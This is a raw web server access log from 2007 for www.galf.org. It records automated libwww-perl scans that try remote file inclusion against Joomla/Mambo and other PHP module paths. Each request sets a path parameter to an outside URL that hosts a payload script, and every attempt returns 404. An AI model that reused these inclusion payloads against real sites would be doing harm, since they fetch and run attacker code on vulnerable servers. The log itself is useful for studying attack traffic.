85.13.65.33 - - [04/Nov/2007:17:17:54 -0800] "GET /logs/access_070827.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:17:54 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:17:54 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:17:54 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.90.50 - - [04/Nov/2007:17:18:06 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.90.50 - - [04/Nov/2007:17:18:06 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.15.90.50 - - [04/Nov/2007:17:18:06 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
207.58.183.177 - - [04/Nov/2007:17:18:09 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:18:09 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.183.177 - - [04/Nov/2007:17:18:25 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cms.alm.cc/contenido/cronjobs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.183.177 - - [04/Nov/2007:17:18:25 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cms.alm.cc/contenido/cronjobs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.56.138 - - [04/Nov/2007:17:18:28 -0800] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eduloco.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.138 - - [04/Nov/2007:17:18:28 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eduloco.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.138 - - [04/Nov/2007:17:18:29 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eduloco.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.35.192.135 - - [04/Nov/2007:17:18:52 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.galf.org"
195.35.192.135 - - [04/Nov/2007:17:18:52 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.galf.org"
195.35.192.135 - - [04/Nov/2007:17:18:52 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.47"
195.35.192.135 - - [04/Nov/2007:17:18:53 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.galf.org"
205.234.130.178 - - [04/Nov/2007:17:18:55 -0800] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org" 80.255.113.219